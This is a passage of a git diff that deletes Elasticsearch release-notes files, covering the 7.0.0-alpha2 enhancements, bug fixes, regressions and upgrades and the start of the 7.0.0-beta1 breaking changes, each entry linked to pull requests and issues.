block of code by the RunOnce class {es-pull}35553[#35553] (issue: {es-issue}35489[#35489]) -* Added wait_for_metadata_version parameter to cluster state api. {es-pull}35535[#35535] -* Extract RunOnce into a dedicated class {es-pull}35489[#35489] -* Introduce elasticsearch-core jar {es-pull}28191[#28191] (issue: {es-issue}27933[#27933]) -* Rename core module to server {es-pull}28180[#28180] (issue: {es-issue}27933[#27933]) - -CRUD:: -* Rename seq# powered optimistic concurrency control parameters to ifSeqNo/ifPrimaryTerm {es-pull}36757[#36757] (issues: {es-issue}10708[#10708], {es-issue}36148[#36148]) -* Expose Sequence Number based Optimistic Concurrency Control in the rest layer {es-pull}36721[#36721] (issues: {es-issue}10708[#10708], {es-issue}36148[#36148]) -* Add doc's sequence number + primary term to GetResult and use it for updates {es-pull}36680[#36680] (issues: {es-issue}10708[#10708], {es-issue}36148[#36148]) -* Add seq no powered optimistic locking support to the index and delete transport actions {es-pull}36619[#36619] (issues: {es-issue}10708[#10708], {es-issue}36148[#36148]) - -Distributed:: -* [Close Index API] Mark shard copy as stale if needed during shard verification {es-pull}36755[#36755] -* [Close Index API] Refactor MetadataIndexStateService {es-pull}36354[#36354] (issue: {es-issue}36249[#36249]) -* [Close Index API] Add TransportShardCloseAction for pre-closing verifications {es-pull}36249[#36249] -* TransportResyncReplicationAction should not honour blocks {es-pull}35795[#35795] (issues: {es-issue}35332[#35332], {es-issue}35597[#35597]) -* Expose all permits acquisition in IndexShard and TransportReplicationAction {es-pull}35540[#35540] (issue: {es-issue}33888[#33888]) -* [RCI] Check blocks while having index shard permit in TransportReplicationAction {es-pull}35332[#35332] (issue: {es-issue}33888[#33888]) - -Engine:: -* Add sequence numbers based optimistic concurrency control support to Engine {es-pull}36467[#36467] (issues: {es-issue}10708[#10708], {es-issue}36148[#36148]) -* Require soft-deletes when access changes snapshot {es-pull}36446[#36446] -* Use delCount of SegmentInfos to calculate numDocs {es-pull}36323[#36323] -* Always configure soft-deletes field of IndexWriterConfig {es-pull}36196[#36196] (issue: {es-issue}36141[#36141]) -* Enable soft-deletes by default on 7.0.0 or later {es-pull}36141[#36141] -* Always return false from `refreshNeeded` on ReadOnlyEngine {es-pull}35837[#35837] (issue: {es-issue}35785[#35785]) -* Add a `_freeze` / `_unfreeze` API {es-pull}35592[#35592] (issue: {es-issue}34352[#34352]) -* [RCI] Add IndexShardOperationPermits.asyncBlockOperations(ActionListener) {es-pull}34902[#34902] (issue: {es-issue}33888[#33888]) - -Features:: -* Simplify deprecation issue levels {es-pull}36326[#36326] - -Index APIs:: -* Add cluster-wide shard limit warnings {es-pull}34021[#34021] (issues: {es-issue}20705[#20705], {es-issue}32856[#32856]) - -Ingest:: -* Grok fix duplicate patterns JAVACLASS and JAVAFILE {es-pull}35886[#35886] -* Implement Drop Processor {es-pull}32278[#32278] (issue: {es-issue}23726[#23726]) - -Java High Level REST Client:: -* Add get users action {es-pull}36332[#36332] (issue: {es-issue}29827[#29827]) -* Add delete template API {es-pull}36320[#36320] (issue: {es-issue}27205[#27205]) -* Implement get-user-privileges API {es-pull}36292[#36292] -* Get Deprecation Info API {es-pull}36279[#36279] (issue: {es-issue}29827[#29827]) -* Add support for Follow Stats API {es-pull}36253[#36253] (issue: {es-issue}33824[#33824]) -* Add support for CCR Stats API {es-pull}36213[#36213] (issue: {es-issue}33824[#33824]) -* Put Role {es-pull}36209[#36209] (issue: {es-issue}29827[#29827]) -* Add index templates exist API {es-pull}36132[#36132] (issue: {es-issue}27205[#27205]) -* Add support for CCR Get Auto Follow Pattern apis {es-pull}36049[#36049] (issue: {es-issue}33824[#33824]) -* Add support for CCR Delete Auto Follow Pattern API {es-pull}35981[#35981] (issue: {es-issue}33824[#33824]) -* Remove fromXContent from IndexUpgradeInfoResponse {es-pull}35934[#35934] -* Add delete expired data API {es-pull}35906[#35906] (issue: {es-issue}29827[#29827]) -* Execute watch API {es-pull}35868[#35868] (issue: {es-issue}29827[#29827]) -* Add ability to put user with a password hash {es-pull}35844[#35844] (issue: {es-issue}35242[#35242]) -* Add ML find file structure API {es-pull}35833[#35833] (issue: {es-issue}29827[#29827]) -* Add support for get roles API {es-pull}35787[#35787] (issue: {es-issue}29827[#29827]) -* Added support for CCR Put Auto Follow Pattern API {es-pull}35780[#35780] (issue: {es-issue}33824[#33824]) -* XPack ML info action {es-pull}35777[#35777] (issue: {es-issue}29827[#29827]) -* ML Delete event from Calendar {es-pull}35760[#35760] (issue: {es-issue}29827[#29827]) -* Add ML revert model snapshot API {es-pull}35750[#35750] (issue: {es-issue}29827[#29827]) -* ML Get Calendar Events {es-pull}35747[#35747] (issue: {es-issue}29827[#29827]) -* Add high-level REST client API for `_freeze` and `_unfreeze` {es-pull}35723[#35723] (issue: {es-issue}34352[#34352]) -* Fix issue in equals impl for GlobalOperationPrivileges {es-pull}35721[#35721] -* ML Delete job from calendar {es-pull}35713[#35713] (issue: {es-issue}29827[#29827]) -* ML Add Event To Calendar API {es-pull}35704[#35704] (issue: {es-issue}29827[#29827]) -* Add ML update model snapshot API (#35537) {es-pull}35694[#35694] (issue: {es-issue}29827[#29827]) -* Add support for CCR Unfollow API {es-pull}35693[#35693] (issue: {es-issue}33824[#33824]) -* Clean up PutLicenseResponse {es-pull}35689[#35689] (issue: {es-issue}35547[#35547]) -* Clean up StartBasicResponse {es-pull}35688[#35688] (issue: {es-issue}35547[#35547]) -* Add support for put privileges API {es-pull}35679[#35679] -* ML Add Job to Calendar API {es-pull}35666[#35666] (issue: {es-issue}29827[#29827]) -* Add support for CCR Resume Follow API {es-pull}35638[#35638] (issue: {es-issue}33824[#33824]) -* Add support for get application privileges API {es-pull}35556[#35556] (issue: {es-issue}29827[#29827]) -* Clean up XPackInfoResponse class and related tests {es-pull}35547[#35547] -* Add parameters to stopRollupJob API {es-pull}35545[#35545] (issue: {es-issue}34811[#34811]) -* Add ML delete model snapshot API {es-pull}35537[#35537] (issue: {es-issue}29827[#29827]) -* Add get watch API {es-pull}35531[#35531] (issue: {es-issue}29827[#29827]) -* Add ML Update Filter API {es-pull}35522[#35522] (issue: {es-issue}29827[#29827]) -* Add ml get filters api {es-pull}35502[#35502] (issue: {es-issue}29827[#29827]) -* Add ML get model snapshots API {es-pull}35487[#35487] (issue: {es-issue}29827[#29827]) -* Add "_has_privileges" API to Security Client {es-pull}35479[#35479] (issue: {es-issue}29827[#29827]) -* Add Delete Privileges API to HLRC {es-pull}35454[#35454] (issue: {es-issue}29827[#29827]) -* Add support for CCR Put Follow API {es-pull}35409[#35409] -* Add ML delete filter action {es-pull}35382[#35382] (issue: {es-issue}29827[#29827]) -* Add delete user action {es-pull}35294[#35294] (issue: {es-issue}29827[#29827]) -* HLRC for _mtermvectors {es-pull}35266[#35266] (issues: {es-issue}27205[#27205], {es-issue}33447[#33447]) -* Reindex API with wait_for_completion false {es-pull}35202[#35202] (issue: {es-issue}27205[#27205]) -* Add watcher stats API {es-pull}35185[#35185] (issue: {es-issue}29827[#29827]) -* HLRC support for getTask {es-pull}35166[#35166] (issue: {es-issue}27205[#27205]) -* Add GetRollupIndexCaps API {es-pull}35102[#35102] (issue: {es-issue}29827[#29827]) -* HLRC: migration api - upgrade {es-pull}34898[#34898] (issue: {es-issue}29827[#29827]) -* Add stop rollup job support to HL REST Client {es-pull}34702[#34702] (issue: {es-issue}29827[#29827]) -* Bulk Api support for global parameters {es-pull}34528[#34528] (issue: {es-issue}26026[#26026]) -* Add delete rollup job support to HL REST Client {es-pull}34066[#34066] (issue: {es-issue}29827[#29827]) -* Add support for get license basic/trial status API {es-pull}33176[#33176] (issue: {es-issue}29827[#29827]) -* Add machine learning open job {es-pull}32860[#32860] (issue: {es-issue}29827[#29827]) -* Add ML HLRC wrapper and put_job API call {es-pull}32726[#32726] -* Add Get Snapshots High Level REST API {es-pull}31537[#31537] (issue: {es-issue}27205[#27205]) - -Java Low Level REST Client:: -* On retry timeout add root exception {es-pull}25576[#25576] - -Monitoring:: -* Make Exporters Async {es-pull}35765[#35765] (issue: {es-issue}35743[#35743]) - -Geo:: -* Adds a name of the field to geopoint parsing errors {es-pull}36529[#36529] (issue: {es-issue}15965[#15965]) -* Add support to ShapeBuilders for building Lucene geometry {es-pull}35707[#35707] (issue: {es-issue}35320[#35320]) -* Add ST_WktToSQL function {es-pull}35416[#35416] (issue: {es-issue}29872[#29872]) - -License:: -* Require acknowledgement to start_trial license {es-pull}30135[#30135] (issue: {es-issue}30134[#30134]) - -Machine Learning:: -* Create the ML annotations index {es-pull}36731[#36731] (issues: {es-issue}26034[#26034], {es-issue}33376[#33376]) -* Split in batches and migrate all jobs and datafeeds {es-pull}36716[#36716] (issue: {es-issue}32905[#32905]) -* Add cluster setting to enable/disable config migration {es-pull}36700[#36700] (issue: {es-issue}32905[#32905]) -* Add audits when deprecation warnings occur with datafeed start {es-pull}36233[#36233] -* Add lazy parsing for DatafeedConfig:Aggs,Query {es-pull}36117[#36117] -* Add support for lazy nodes (#29991) {es-pull}34538[#34538] (issue: {es-issue}29991[#29991]) - -Network:: -* Unify transport settings naming {es-pull}36623[#36623] -* Add sni name to SSLEngine in netty transport {es-pull}33144[#33144] (issue: {es-issue}32517[#32517]) -* Add cors support to NioHttpServerTransport {es-pull}30827[#30827] (issue: {es-issue}28898[#28898]) -* Reintroduce mandatory http pipelining support {es-pull}30820[#30820] -* Make http pipelining support mandatory {es-pull}30695[#30695] (issues: {es-issue}28898[#28898], {es-issue}29500[#29500]) -* Add nio http server transport {es-pull}29587[#29587] (issue: {es-issue}28898[#28898]) -* Selectors operate on channel contexts {es-pull}28468[#28468] (issue: {es-issue}27260[#27260]) -* Unify nio read / write channel contexts {es-pull}28160[#28160] (issue: {es-issue}27260[#27260]) -* Create nio-transport plugin for NioTransport {es-pull}27949[#27949] (issue: {es-issue}27260[#27260]) -* Add elasticsearch-nio jar for base nio classes {es-pull}27801[#27801] (issue: {es-issue}27802[#27802]) -* Add NioGroup for use in different transports {es-pull}27737[#27737] (issue: {es-issue}27260[#27260]) -* Add read timeouts to http module {es-pull}27713[#27713] -* Implement byte array reusage in `NioTransport` {es-pull}27696[#27696] (issue: {es-issue}27563[#27563]) -* Introduce resizable inbound byte buffer {es-pull}27551[#27551] (issue: {es-issue}27563[#27563]) -* Decouple nio constructs from the tcp transport {es-pull}27484[#27484] (issue: {es-issue}27260[#27260]) -* Remove manual tracking of registered channels {es-pull}27445[#27445] (issue: {es-issue}27260[#27260]) -* Remove tcp profile from low level nio channel {es-pull}27441[#27441] (issue: {es-issue}27260[#27260]) -* Decouple `ChannelFactory` from Tcp classes {es-pull}27286[#27286] (issue: {es-issue}27260[#27260]) - -Packaging:: -* Introduce Docker images build {es-pull}36246[#36246] -* Move creation of temporary directory to Java {es-pull}36002[#36002] (issue: {es-issue}31003[#31003]) - -Plugins:: -* Plugin install: don't print download progress in batch mode {es-pull}36361[#36361] - -Ranking:: -* Vector field {es-pull}33022[#33022] (issue: {es-issue}31615[#31615]) - -Recovery:: -* Exposed engine must include all operations below global checkpoint during rollback {es-pull}36159[#36159] (issue: {es-issue}32867[#32867]) - -Rollup:: -* Add non-X-Pack centric rollup endpoints {es-pull}36383[#36383] (issues: {es-issue}35958[#35958], {es-issue}35962[#35962]) -* Add more diagnostic stats to job {es-pull}35471[#35471] -* Add `wait_for_completion` option to StopRollupJob API {es-pull}34811[#34811] (issue: {es-issue}34574[#34574]) - -Scripting:: -* Update joda compat methods to use compat class {es-pull}36654[#36654] -* [Painless] Add boxed type to boxed type casts for method/return {es-pull}36571[#36571] -* [Painless] Add def to boxed type casts {es-pull}36506[#36506] - -Settings:: -* Add user-defined cluster metadata {es-pull}33325[#33325] (issue: {es-issue}33220[#33220]) - -Search:: -* Add copy constructor to SearchRequest {es-pull}36641[#36641] (issue: {es-issue}32125[#32125]) -* Add raw sort values to SearchSortValues transport serialization {es-pull}36617[#36617] (issue: {es-issue}32125[#32125]) -* Add sort and collapse info to SearchHits transport serialization {es-pull}36555[#36555] (issue: {es-issue}32125[#32125]) -* Add default methods to DocValueFormat {es-pull}36480[#36480] -* Respect indices options on _msearch {es-pull}35887[#35887] -* Allow efficient can_match phases on frozen indices {es-pull}35431[#35431] (issues: {es-issue}34352[#34352], {es-issue}34357[#34357]) -* Add a new query type - ScriptScoreQuery {es-pull}34533[#34533] (issues: {es-issue}23850[#23850], {es-issue}27588[#27588], {es-issue}30303[#30303]) - -Security:: -* Make credentials mandatory when launching xpack/migrate {es-pull}36197[#36197] (issues: {es-issue}29847[#29847], {es-issue}33972[#33972]) - -Snapshot/Restore:: -* Allow Parallel Restore Operations {es-pull}36397[#36397] -* Repo Creation out of ClusterStateTask {es-pull}36157[#36157] (issue: {es-issue}9488[#9488]) -* Add read-only repository verification {es-pull}35731[#35731] (issue: {es-issue}35703[#35703]) - -SQL:: -* Extend the ODBC metric by differentiating between 32 and 64bit platforms {es-pull}36753[#36753] (issue: {es-issue}36740[#36740]) -* Fix wrong appliance of StackOverflow limit for IN {es-pull}36724[#36724] (issue: {es-issue}36592[#36592]) -* Introduce NOW/CURRENT_TIMESTAMP function {es-pull}36562[#36562] (issue: {es-issue}36534[#36534]) -* Move requests' parameters to requests JSON body {es-pull}36149[#36149] (issue: {es-issue}35992[#35992]) -* Make INTERVAL millis optional {es-pull}36043[#36043] (issue: {es-issue}36032[#36032]) -* Implement data type verification for conditionals {es-pull}35916[#35916] (issue: {es-issue}35907[#35907]) -* Implement GREATEST and LEAST functions {es-pull}35879[#35879] (issue: {es-issue}35878[#35878]) -* Implement null safe equality operator `<=>` {es-pull}35873[#35873] (issue: {es-issue}35871[#35871]) -* SYS COLUMNS returns ODBC specific schema {es-pull}35870[#35870] (issue: {es-issue}35376[#35376]) -* Polish grammar for intervals {es-pull}35853[#35853] -* Add filtering to SYS TYPES {es-pull}35852[#35852] (issue: {es-issue}35342[#35342]) -* Implement NULLIF(expr1, expr2) function {es-pull}35826[#35826] (issue: {es-issue}35818[#35818]) -* Lock down JDBC driver {es-pull}35798[#35798] (issue: {es-issue}35437[#35437]) -* Implement NVL(expr1, expr2) {es-pull}35794[#35794] (issue: {es-issue}35782[#35782]) -* Implement ISNULL(expr1, expr2) {es-pull}35793[#35793] (issue: {es-issue}35781[#35781]) -* Implement IFNULL variant of COALESCE {es-pull}35762[#35762] (issue: {es-issue}35749[#35749]) -* XPack FeatureSet functionality {es-pull}35725[#35725] (issue: {es-issue}34821[#34821]) -* Perform lazy evaluation of mismatched mappings {es-pull}35676[#35676] (issues: {es-issue}35659[#35659], {es-issue}35675[#35675]) -* Improve validation of unsupported fields {es-pull}35675[#35675] (issue: {es-issue}35673[#35673]) -* Move internals from Joda to java.time {es-pull}35649[#35649] (issue: {es-issue}35633[#35633]) - -Stats:: -* Handle OS pretty name on old OS without OS release {es-pull}35453[#35453] (issue: {es-issue}35440[#35440]) - -Task Management:: -* Periodically try to reassign unassigned persistent tasks {es-pull}36069[#36069] (issue: {es-issue}35792[#35792]) -* Only require task permissions {es-pull}35667[#35667] (issue: {es-issue}35573[#35573]) -* Retry if task can't be written {es-pull}35054[#35054] (issue: {es-issue}33764[#33764]) - -ZenDiscovery:: -* Add discovery types to cluster stats {es-pull}36442[#36442] -* Introduce `zen2` discovery type {es-pull}36298[#36298] -* Zen2: Persist cluster states the old way on non-master-eligible nodes {es-pull}36247[#36247] (issue: {es-issue}3[#3]) -* [Zen2] Storage layer WriteStateException propagation {es-pull}36052[#36052] -* [Zen2] Implement Tombstone REST APIs {es-pull}36007[#36007] -* [Zen2] Update default for USE_ZEN2 to true {es-pull}35998[#35998] -* [Zen2] Add warning if cluster fails to form fast enough {es-pull}35993[#35993] -* [Zen2] Allow Setting a List of Bootstrap Nodes to Wait for {es-pull}35847[#35847] -* [Zen2] VotingTombstone class {es-pull}35832[#35832] -* [Zen2] PersistedState interface implementation {es-pull}35819[#35819] -* [Zen2] Support rolling upgrades from Zen1 {es-pull}35737[#35737] -* [Zen2] Add lag detector {es-pull}35685[#35685] -* [Zen2] Move ClusterState fields to be persisted to ClusterState.Metadata {es-pull}35625[#35625] -* [Zen2] Introduce ClusterBootstrapService {es-pull}35488[#35488] -* [Zen2] Introduce vote withdrawal {es-pull}35446[#35446] -* Zen2: Add basic Zen1 transport-level BWC {es-pull}35443[#35443] - -[[bug-7.0.0-alpha2]] -[discrete] -=== Bug fixes - -Aggregations:: -* fix MultiValuesSourceFieldConfig toXContent {es-pull}36525[#36525] (issue: {es-issue}36474[#36474]) -* Cache the score of the parent document in the nested agg {es-pull}36019[#36019] (issues: {es-issue}34555[#34555], {es-issue}35985[#35985]) -* Correct implemented interface of ParsedReverseNested {es-pull}35455[#35455] (issue: {es-issue}35449[#35449]) -* Handle IndexOrDocValuesQuery in composite aggregation {es-pull}35392[#35392] - -Audit:: -* Fix origin.type for connection_* events {es-pull}36410[#36410] -* Fix IndexAuditTrail rolling restart on rollover edge {es-pull}35988[#35988] (issue: {es-issue}33867[#33867]) - -Authentication:: -* Fix kerberos setting registration {es-pull}35986[#35986] (issues: {es-issue}30241[#30241], {es-issue}35942[#35942]) -* Add support for Kerberos V5 Oid {es-pull}35764[#35764] (issue: {es-issue}34763[#34763]) - -Build:: -* Use explicit deps on test tasks for check {es-pull}36325[#36325] -* Fix jdbc jar pom to not include deps {es-pull}36036[#36036] (issue: {es-issue}32014[#32014]) -* Fix official plugins list {es-pull}35661[#35661] (issue: {es-issue}35623[#35623]) - -CCR:: -* Fix follow stats API's follower index filtering feature {es-pull}36647[#36647] -* AutoFollowCoordinator should tolerate that auto follow patterns may be removed {es-pull}35945[#35945] (issue: {es-issue}35937[#35937]) -* Only auto follow indices when all primary shards have started {es-pull}35814[#35814] (issue: {es-issue}35480[#35480]) -* Avoid NPE in follower stats when no tasks metadata {es-pull}35802[#35802] -* Fix the names of CCR stats endpoints in usage API {es-pull}35438[#35438] - -Circuit Breakers:: -* Modify `BigArrays` to take name of circuit breaker {es-pull}36461[#36461] (issue: {es-issue}31435[#31435]) - -Core:: -* Fix CompositeBytesReference#slice to not throw AIOOBE with legal offsets. {es-pull}35955[#35955] (issue: {es-issue}35950[#35950]) -* Suppress CachedTimeThread in hot threads output {es-pull}35558[#35558] (issue: {es-issue}23175[#23175]) -* Upgrade to Joda 2.10.1 {es-pull}35410[#35410] (issue: {es-issue}33749[#33749]) - -Distributed:: -* Combine the execution of an exclusive replica operation with primary term update {es-pull}36116[#36116] (issue: {es-issue}35850[#35850]) -* ActiveShardCount should not fail when closing the index {es-pull}35936[#35936] - -Engine:: -* Set Lucene version upon index creation. {es-pull}36038[#36038] (issue: {es-issue}33826[#33826]) -* Wrap can_match reader with ElasticsearchDirectoryReader {es-pull}35857[#35857] -* Copy checkpoint atomically when rolling generation {es-pull}35407[#35407] - -Geo:: -* More robust handling of ignore_malformed in geoshape parsing {es-pull}35603[#35603] (issues: {es-issue}34047[#34047], {es-issue}34498[#34498]) -* Better handling of malformed geo_points {es-pull}35554[#35554] (issue: {es-issue}35419[#35419]) -* Enables coerce support in WKT polygon parser {es-pull}35414[#35414] (issue: {es-issue}35059[#35059]) - -Index APIs:: -* Fix duplicate phrase in shrink/split error message {es-pull}36734[#36734] (issue: {es-issue}36729[#36729]) -* Raise a 404 exception when document source is not found (#33384) {es-pull}34083[#34083] (issue: {es-issue}33384[#33384]) - -Ingest:: -* Fix on_failure with Drop processor {es-pull}36686[#36686] (issue: {es-issue}36151[#36151]) -* Support default pipelines + bulk upserts {es-pull}36618[#36618] (issue: {es-issue}36219[#36219]) -* Support default pipeline through an alias {es-pull}36231[#36231] (issue: {es-issue}35817[#35817]) - -License:: -* Do not serialize basic license exp in x-pack info {es-pull}30848[#30848] -* Update versions for start_trial after backport {es-pull}30218[#30218] (issue: {es-issue}30135[#30135]) - -Machine Learning:: -* Interrupt Grok in file structure finder timeout {es-pull}36588[#36588] -* Prevent stack overflow while copying ML jobs and datafeeds {es-pull}36370[#36370] (issue: {es-issue}36360[#36360]) -* Adjust file structure finder parser config {es-pull}35935[#35935] -* Fix find_file_structure NPE with should_trim_fields {es-pull}35465[#35465] (issue: {es-issue}35462[#35462]) -* Prevent notifications being created on deletion of a non existent job {es-pull}35337[#35337] (issues: {es-issue}34058[#34058], {es-issue}35336[#35336]) -* Clear Job#finished_time when it is opened (#32605) {es-pull}32755[#32755] -* Fix thread leak when waiting for job flush (#32196) {es-pull}32541[#32541] (issue: {es-issue}32196[#32196]) -* Fix CPoissonMeanConjugate sampling error. {ml-pull}335[#335] - -Network:: -* Do not resolve addresses in remote connection info {es-pull}36671[#36671] (issue: {es-issue}35658[#35658]) -* Always compress based on the settings {es-pull}36522[#36522] (issue: {es-issue}36399[#36399]) -* http.publish_host Should Contain CNAME {es-pull}32806[#32806] (issue: {es-issue}22029[#22029]) -* Adjust SSLDriver behavior for JDK11 changes {es-pull}32145[#32145] (issues: {es-issue}32122[#32122], {es-issue}32144[#32144]) -* Add TRACE, CONNECT, and PATCH http methods {es-pull}31035[#31035] (issue: {es-issue}31017[#31017]) -* Transport client: Don't validate node in handshake {es-pull}30737[#30737] (issue: {es-issue}30141[#30141]) -* Fix issue with finishing handshake in ssl driver {es-pull}30580[#30580] -* Remove potential nio selector leak {es-pull}27825[#27825] -* Fix issue where the incorrect buffers are written {es-pull}27695[#27695] (issue: {es-issue}27551[#27551]) -* Do not set SO_LINGER on server channels {es-pull}26997[#26997] -* Do not set SO_LINGER to 0 when not shutting down {es-pull}26871[#26871] (issue: {es-issue}26764[#26764]) -* Release pipelined http responses on close {es-pull}26226[#26226] - -Packaging:: -* Fix error message when package install fails due to missing Java {es-pull}36077[#36077] (issue: {es-issue}31845[#31845]) -* Add missing entries to conffiles {es-pull}35810[#35810] (issue: {es-issue}35691[#35691]) - -Plugins:: -* Ensure that azure stream has socket privileges {es-pull}28751[#28751] (issue: {es-issue}28662[#28662]) - -Recovery:: -* Register ResyncTask.Status as a NamedWriteable {es-pull}36610[#36610] - -Rollup:: -* Fix rollup search statistics {es-pull}36674[#36674] - -Scripting:: -* Properly support no-offset date formatting {es-pull}36316[#36316] (issue: {es-issue}36306[#36306]) -* [Painless] Generate Bridge Methods {es-pull}36097[#36097] -* Fix serialization bug in painless execute api request {es-pull}36075[#36075] (issue: {es-issue}36050[#36050]) -* Actually add joda time back to whitelist {es-pull}35965[#35965] (issue: {es-issue}35915[#35915]) -* Add back joda to whitelist {es-pull}35915[#35915] (issue: {es-issue}35913[#35913]) - -Settings:: -* Correctly Identify Noop Updates {es-pull}36560[#36560] (issue: {es-issue}36496[#36496]) - -SQL:: -* Fix translation of LIKE/RLIKE keywords {es-pull}36672[#36672] (issues: {es-issue}36039[#36039], {es-issue}36584[#36584]) -* Scripting support for casting functions CAST and CONVERT {es-pull}36640[#36640] (issue: {es-issue}36061[#36061]) -* Fix translation to painless for conditionals {es-pull}36636[#36636] (issue: {es-issue}36631[#36631]) -* Concat should be always not nullable {es-pull}36601[#36601] (issue: {es-issue}36169[#36169]) -* Fix MOD() for long and integer arguments {es-pull}36599[#36599] (issue: {es-issue}36364[#36364]) -* Fix issue with complex HAVING and GROUP BY ordinal {es-pull}36594[#36594] (issue: {es-issue}36059[#36059]) -* Be lenient for tests involving comparison to H2 but strict for csv spec tests {es-pull}36498[#36498] (issue: {es-issue}36483[#36483]) -* Non ISO 8601 versions of DAY_OF_WEEK and WEEK_OF_YEAR functions {es-pull}36358[#36358] (issue: {es-issue}36263[#36263]) -* Do not ignore all fields whose names start with underscore {es-pull}36214[#36214] (issue: {es-issue}36206[#36206]) -* Fix issue with wrong data type for scripted Grouping keys {es-pull}35969[#35969] (issue: {es-issue}35662[#35662]) -* Fix translation of math functions to painless {es-pull}35910[#35910] (issue: {es-issue}35654[#35654]) -* Fix jdbc jar to include deps {es-pull}35602[#35602] -* Fix query translation for scripted queries {es-pull}35408[#35408] (issue: {es-issue}35232[#35232]) -* Clear the cursor if nested inner hits are enough to fulfill the query required limits {es-pull}35398[#35398] (issue: {es-issue}35176[#35176]) -* Introduce IsNull node to simplify expressions {es-pull}35206[#35206] (issues: {es-issue}34876[#34876], {es-issue}35171[#35171]) -* The SSL default configuration shouldn't override the https protocol if used {es-pull}34635[#34635] (issue: {es-issue}33817[#33817]) -* Minor fix for javadoc {es-pull}32573[#32573] (issue: {es-issue}32553[#32553]) - -Search:: -* Inner hits fail to propagate doc-value format. {es-pull}36310[#36310] -* Fix custom AUTO issue with Fuzziness#toXContent {es-pull}35807[#35807] (issue: {es-issue}33462[#33462]) -* Fix analyzed prefix query in query_string {es-pull}35756[#35756] (issue: {es-issue}31702[#31702]) -* Fix problem with MatchNoDocsQuery in disjunction queries {es-pull}35726[#35726] (issue: {es-issue}34708[#34708]) -* Fix phrase_slop in query_string query {es-pull}35533[#35533] (issue: {es-issue}35125[#35125]) -* Add a More Like This query routing requirement check (#29678) {es-pull}33974[#33974] - -Security:: -* Remove license state listeners on closeables {es-pull}36308[#36308] (issues: {es-issue}33328[#33328], {es-issue}35627[#35627], {es-issue}35628[#35628]) - -Snapshot/Restore:: -* Upgrade GCS Dependencies to 1.55.0 {es-pull}36634[#36634] (issues: {es-issue}35229[#35229], {es-issue}35459[#35459]) -* Improve Resilience SnapshotShardService {es-pull}36113[#36113] (issue: {es-issue}32265[#32265]) -* Keep SnapshotsInProgress State in Sync with Routing Table {es-pull}35710[#35710] -* Ensure that gcs client creation is privileged {es-pull}25938[#25938] (issue: {es-issue}25932[#25932]) -* Make calls to CloudBlobContainer#exists privileged {es-pull}25937[#25937] (issue: {es-issue}25931[#25931]) - -Watcher:: -* Watcher accounts constructed lazily {es-pull}36656[#36656] -* Only trigger a watch if new or schedule/changed {es-pull}35908[#35908] -* Fix Watcher NotificationService's secure settings {es-pull}35610[#35610] (issue: {es-issue}35378[#35378]) -* Fix integration tests to ensure correct start/stop of Watcher {es-pull}35271[#35271] (issues: {es-issue}29877[#29877], {es-issue}30705[#30705], {es-issue}33291[#33291], {es-issue}34448[#34448], {es-issue}34462[#34462]) - -ZenDiscovery:: -* [Zen2] Respect the no_master_block setting {es-pull}36478[#36478] -* Cancel GetDiscoveredNodesAction when bootstrapped {es-pull}36423[#36423] (issues: {es-issue}36380[#36380], {es-issue}36381[#36381]) -* [Zen2] Only elect master-eligible nodes {es-pull}35996[#35996] -* [Zen2] Remove duplicate discovered peers {es-pull}35505[#35505] - - -[[regression-7.0.0-alpha2]] -[discrete] -=== Regressions - -Scripting:: -* Use Number as a return value for BucketAggregationScript {es-pull}35653[#35653] (issue: {es-issue}35351[#35351]) - - -[[upgrade-7.0.0-alpha2]] -[discrete] -=== Upgrades - -Ingest:: -* Update geolite2 database in ingest geoip plugin {es-pull}33840[#33840] - -Network:: -* Upgrade Netty 4.3.32.Final {es-pull}36102[#36102] (issue: {es-issue}35360[#35360]) diff --git a/docs/reference/release-notes/7.0.0-beta1.asciidoc b/docs/reference/release-notes/7.0.0-beta1.asciidoc deleted file mode 100644 index 4a2f3f0c14a..00000000000 --- a/docs/reference/release-notes/7.0.0-beta1.asciidoc +++ /dev/null @@ -1,689 +0,0 @@ -[[release-notes-7.0.0-beta1]] -== {es} version 7.0.0-beta1 - -Also see <>. - -[[breaking-7.0.0-beta1]] -[discrete] -=== Breaking changes - -Audit:: -* Remove index audit output type {es-pull}37707[#37707] (issues: {es-issue}29881[#29881], {es-issue}37301[#37301]) - -Authentication:: -* Remove bwc logic for token invalidation {es-pull}36893[#36893] (issue: {es-issue}36727[#36727]) - -Authorization:: -* Remove implicit index monitor privilege {es-pull}37774[#37774] - -CCR:: -* Follow stats api should return a 404 when requesting stats for a non existing index {es-pull}37220[#37220] (issue: {es-issue}37021[#37021]) - -CRUD:: -* Remove support for internal versioning for concurrency control {es-pull}38254[#38254] (issue: {es-issue}1078[#1078]) - -Features/Ingest:: -* Add ECS schema for user-agent ingest processor (#37727) {es-pull}37984[#37984] (issues: {es-issue}37329[#37329], {es-issue}37727[#37727]) -* Remove special handling for ingest plugins {es-pull}36967[#36967] (issues: {es-issue}36898[#36898], {es-issue}36956[#36956]) - -Features/Java Low Level REST Client:: -* Drop support for the low-level REST client on JDK 7 {es-pull}38540[#38540] (issue: {es-issue}29607[#29607]) - -Features/Watcher:: -* Remove Watcher Account "unsecure" settings {es-pull}36736[#36736] (issue: {es-issue}36403[#36403]) - -Infra/Logging:: -* Elasticsearch json logging {es-pull}36833[#36833] (issue: {es-issue}32850[#32850]) - -Infra/Packaging:: -* Package ingest-user-agent as a module {es-pull}36956[#36956] -* Package ingest-geoip as a module {es-pull}36898[#36898] - -Machine Learning:: -* [ML] Remove types from datafeed {es-pull}36538[#36538] (issue: {es-issue}34265[#34265]) - -Mapping:: -* Make sure to reject mappings with type _doc when include_type_name is false. {es-pull}38270[#38270] (issue: {es-issue}38266[#38266]) -* Update the default for include_type_name to false. {es-pull}37285[#37285] -* Support 'include_type_name' in RestGetIndicesAction {es-pull}37149[#37149] - -Network:: -* Remove TLS 1.0 as a default SSL protocol {es-pull}37512[#37512] (issue: {es-issue}36021[#36021]) -* Security: remove SSL settings fallback {es-pull}36846[#36846] (issue: {es-issue}29797[#29797]) - -Ranking:: -* Forbid negative field boosts in analyzed queries {es-pull}37930[#37930] (issue: {es-issue}33309[#33309]) - -Search:: -* Track total hits up to 10,000 by default {es-pull}37466[#37466] (issue: {es-issue}33028[#33028]) -* Use mappings to format doc-value fields by default. {es-pull}30831[#30831] (issues: {es-issue}26948[#26948], {es-issue}29639[#29639]) - -Security:: -* Remove heuristics that enable security on trial licenses {es-pull}38075[#38075] (issue: {es-issue}38009[#38009]) - -ZenDiscovery:: -* Remove DiscoveryPlugin#getDiscoveryTypes {es-pull}38414[#38414] (issue: {es-issue}38410[#38410]) - - - 